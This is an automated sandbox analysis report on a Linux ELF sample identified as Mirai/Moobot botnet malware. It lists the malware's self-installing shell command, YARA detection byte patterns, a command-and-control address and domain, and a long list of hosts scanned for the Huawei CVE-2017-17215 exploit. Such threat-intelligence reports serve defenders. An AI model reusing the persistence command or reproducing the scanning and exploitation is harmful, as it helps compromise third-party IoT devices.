Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.elf

Overview

General Information

Sample Name:x86_64.elf
Analysis ID:830862
MD5:31bc5e9f752e5b6bbd24544e54142086
SHA1:2a2cfe59b83fb19829cc19fe1dfbc7d6cd6b57ff
SHA256:334de74bf734a40b9a1d9b9f8fc9b694bd3ae544d99c09a7e5dd400d5cf3343b
Tags:elfGafgytmirai
Infos:

Detection

Mirai, Moobot
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830862
Start date and time:2023-03-20 18:44:30 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 37s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:x86_64.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/x86_64.elf
PID:6226
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:sh: 1: cannot create bin/watchdog: Directory nonexistent
chmod: cannot access 'bin/watchdog': No such file or directory

Process Tree

  • system is lnxubuntu20
  • x86_64.elf (PID: 6226, Parent: 6122, MD5: 31bc5e9f752e5b6bbd24544e54142086) Arguments: /tmp/x86_64.elf
    • sh (PID: 6227, Parent: 6226, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 6228, Parent: 6227)
      • rm (PID: 6228, Parent: 6227, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 6229, Parent: 6227)
      • mkdir (PID: 6229, Parent: 6227, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin@\\x9e~l\\xfc
      • sh New Fork (PID: 6231, Parent: 6227)
      • chmod (PID: 6231, Parent: 6227, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
x86_64.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    x86_64.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_64.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xce48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xce98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xceac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xced4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcefc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xcfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      x86_64.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      x86_64.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      Click to see the 11 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6226.1.0000000000400000.000000000040f000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6226.1.0000000000400000.000000000040f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6226.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xce48:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce5c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce70:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce84:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xce98:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xceac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcec0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xced4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcee8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcefc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf10:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf24:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf38:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf4c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcf9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfb0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xcfd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          6226.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x912c:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6226.1.0000000000400000.000000000040f000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x97df:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          Click to see the 12 entries

          Snort Signatures

          Timestamp:192.168.2.2341.237.57.2459722372152835222 03/20/23-18:45:24.095464
          SID:2835222
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2334.117.60.12155010372152835222 03/20/23-18:46:43.951969
          SID:2835222
          Source Port:55010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23172.87.207.2655956372152835222 03/20/23-18:46:49.166628
          SID:2835222
          Source Port:55956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23195.133.40.20236176569992030490 03/20/23-18:45:18.014810
          SID:2030490
          Source Port:36176
          Destination Port:56999
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:195.133.40.202192.168.2.2356999361762030489 03/20/23-18:47:20.158707
          SID:2030489
          Source Port:56999
          Destination Port:36176
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2334.120.62.2545848372152835222 03/20/23-18:46:43.953554
          SID:2835222
          Source Port:45848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23147.146.246.20743420372152835222 03/20/23-18:46:40.914230
          SID:2835222
          Source Port:43420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.44.217.3848448372152835222 03/20/23-18:45:35.250142
          SID:2835222
          Source Port:48448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2341.47.127.8953138372152835222 03/20/23-18:45:47.393680
          SID:2835222
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23197.246.253.7246886372152835222 03/20/23-18:46:09.990245
          SID:2835222
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.2365.121.182.20447404372152835222 03/20/23-18:46:40.895758
          SID:2835222
          Source Port:47404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.23154.211.39.15455138372152835222 03/20/23-18:46:11.261546
          SID:2835222
          Source Port:55138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: x86_64.elfReversingLabs: Detection: 53%
          Source: x86_64.elfVirustotal: Detection: 62%Perma Link
          Machine Learning detection for sample
          Source: x86_64.elfJoe Sandbox ML: detected

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
          Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59722 -> 41.237.57.24:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48448 -> 41.44.217.38:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53138 -> 41.47.127.89:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46886 -> 197.246.253.72:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55138 -> 154.211.39.154:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47404 -> 65.121.182.204:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43420 -> 147.146.246.207:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55010 -> 34.117.60.121:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45848 -> 34.120.62.25:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55956 -> 172.87.207.26:37215
          Connects to many ports of the same IP (likely port scanning)
          Source: global trafficTCP traffic: 197.128.96.186 ports 1,2,3,5,7,37215
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 59722 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59722
          Source: unknownNetwork traffic detected: HTTP traffic on port 48448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48448
          Source: unknownNetwork traffic detected: HTTP traffic on port 53138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53138
          Source: unknownNetwork traffic detected: HTTP traffic on port 46886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46886
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47404 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43420 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Performs DNS queries to domains with low reputation
          Source: DNS query: test.zxyes.xyz
          Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
          Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
          Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.69.213.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 54.181.112.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.201.50.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.46.216.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.181.232.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.121.7.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.160.5.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.108.7.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.247.82.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.62.100.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.253.49.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.138.145.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.153.27.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.60.185.218:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.25.151.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.50.115.70:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.119.64.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.93.178.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 216.156.238.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.22.72.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 34.139.69.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.195.197.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.254.83.178:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.41.105.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.48.0.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.111.249.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 131.169.35.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.168.121.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 217.92.220.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.3.31.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 190.211.76.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.66.89.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.251.233.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.21.179.143:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 168.152.147.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.184.179.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.172.95.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.186.24.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.4.239.11:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 166.21.183.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.172.226.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.240.136.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 98.118.100.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.52.39.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.86.147.69:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.172.201.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 158.179.115.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 95.216.203.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.159.240.246:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.49.212.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.79.7.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.218.211.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 13.162.121.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.220.121.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.153.147.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.254.19.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 113.126.214.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 4.125.192.245:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.180.62.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.146.131.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 49.226.243.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.113.37.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.225.99.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.210.217.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.190.232.33:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 221.109.213.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.148.180.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.42.15.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.184.195.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.116.235.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 128.13.38.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 181.155.69.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.237.101.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.189.111.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.106.31.63:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 213.252.185.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.250.160.111:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.94.173.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 193.146.21.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.197.55.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.72.4.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 99.23.178.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 220.180.122.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.99.120.219:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 61.247.226.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 38.119.240.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.218.45.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 54.100.71.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.136.208.116:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.100.146.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.188.240.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.13.198.16:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.61.71.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.29.147.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 217.130.144.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.75.8.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.32.146.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.164.175.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 74.196.161.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.180.235.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.246.59.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.189.247.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.76.164.154:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.185.19.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 17.154.169.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.226.129.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.129.175.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.176.184.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 58.211.116.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.100.62.14:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.202.114.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 113.64.225.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.141.121.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 111.198.75.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 142.96.69.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.69.10.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.153.202.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 176.208.252.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.227.143.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.16.39.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 197.106.90.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.15.14.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.209.226.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.160.105.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.84.181.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 157.52.61.118:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.81.21.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.80.195.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 41.106.12.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:65044 -> 179.160.180.90:37215
